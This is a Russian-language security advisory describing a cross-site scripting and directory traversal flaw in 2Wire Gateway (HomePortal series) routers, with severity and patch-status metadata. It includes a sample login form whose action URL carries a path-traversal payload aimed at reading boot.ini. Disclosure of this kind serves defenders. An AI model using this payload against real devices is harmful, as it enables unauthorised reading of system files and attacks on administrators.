Security Lab

Межсайтовый скриптинг в 2Wire Gateway

Дата публикации:23.01.2004
Дата изменения:13.11.2008
Всего просмотров:1011
Опасность:
Низкая
Наличие исправления: Нет
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации: Удаленная
Воздействие: Межсайтовый скриптинг
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты: 2Wire HomePortal Series
Уязвимые версии: 2Wire Gateway

Описание: Уязвимость обнаружена в 2Wire Gateway. Удаленный пользователь может выполнить XSS нападение против администратора.

<form name="wralogin" method="get"
action="http://<host>/wra/public/wralogin/?error=61&return=password/../../..
/../boot.ini">
<input type="hidden" name="authcode" value="MUQmqC/sBiXfslfYEooIJg==">
<center>
<input type="password" name="password" value="">
<input type="submit" alt="Submit" width="58" height="19" border="0"></td>
</form>
</body>
</html>

URL производителя:www.2wire.com

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: 2Wire-Gateway Cross Site Scripting and Directory Transversal bug in SSL Form